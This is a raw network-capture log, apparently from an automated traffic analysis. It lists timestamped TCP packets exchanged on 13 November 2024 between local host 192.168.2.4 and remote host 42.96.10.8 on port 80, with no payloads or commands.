                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829322100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829324007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829332113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829349041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829364061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829366922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829382896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829397917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829404116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829426050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829442978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829446077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829458952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829474926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829488039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829499960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829516888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829518080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829533100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829547882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829565048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829566956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829591990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829832077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829847097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829864025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829876900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829879999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829898119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829906940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829914093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829929113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829938889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829946995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829972029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829982042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.829986095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830002069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830003977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830017090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830034018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830056906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830066919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830075026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830086946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830092907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830108881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830123901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830125093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830140114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830149889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830156088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830171108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830178022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830188990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830214024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830225945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830229998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830245018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830271006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830286026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830301046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830322027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830322027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830322027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830324888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830342054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830353022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830357075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830380917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830394030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830394030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830410004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830426931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830442905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830445051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830460072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830465078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830476046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830491066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830497980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830498934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830517054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830526114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830543041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830558062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830559969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830576897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830590963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830606937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830622911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830640078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830653906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830661058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830661058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830661058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830672979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830688000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830702066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830704927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830722094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830724955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830737114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830749989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830760002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830765009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830781937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830781937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830799103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830832005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830864906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830902100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830925941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.830988884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831038952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831084967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831099987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831159115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831199884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831216097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831248045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831326008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831342936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831358910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831372976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831387997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831402063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831415892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831418037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831434011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831453085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831459999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831475973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831490993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831509113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831515074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831531048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831532955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831548929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831562996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831576109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831578016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831593990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831594944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831613064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831628084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831629992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831645966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831660986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831676960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831690073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831715107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831729889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831743956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831743956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831743956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831758022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831770897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831773996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831789017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831805944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831809998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831830978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831845045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831846952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831865072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831878901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831882954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831899881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.831938028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.868886948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.868940115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.868947029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.868968964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.868984938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869000912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869016886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869030952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869030952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869045019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869060993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869077921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869093895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869111061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869112015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869112015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869127035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869147062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869193077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.869193077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871661901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871682882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871716976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871743917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871757984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871778011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871778011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871784925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871800900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871818066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871831894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871848106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871862888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871864080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871864080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871892929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871893883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871911049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871927977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871956110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871958971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871969938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871973991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.871988058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872004032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872019053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872033119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872050047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872065067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872081995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872096062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872096062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872097015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872116089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872131109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872147083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872154951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872154951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872164965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872180939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872227907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.872227907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901395082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901412010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901439905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901472092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901482105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901489973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901504040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901539087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901539087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901721001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901742935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901758909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901778936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901935101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901951075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.901968002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902033091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902049065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902049065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902076006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902076960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902093887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902128935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902146101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902160883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902160883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902160883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902178049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902196884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902199030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902215004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902230024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902234077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902277946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902292013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902295113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902302980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902318954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902335882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902349949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902349949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.902394056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907768965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907784939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907800913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907826900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907860041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907864094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907864094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907876015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907891989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907907963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907927990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907957077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.907957077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.928657055 CET804973342.96.10.8192.168.2.4
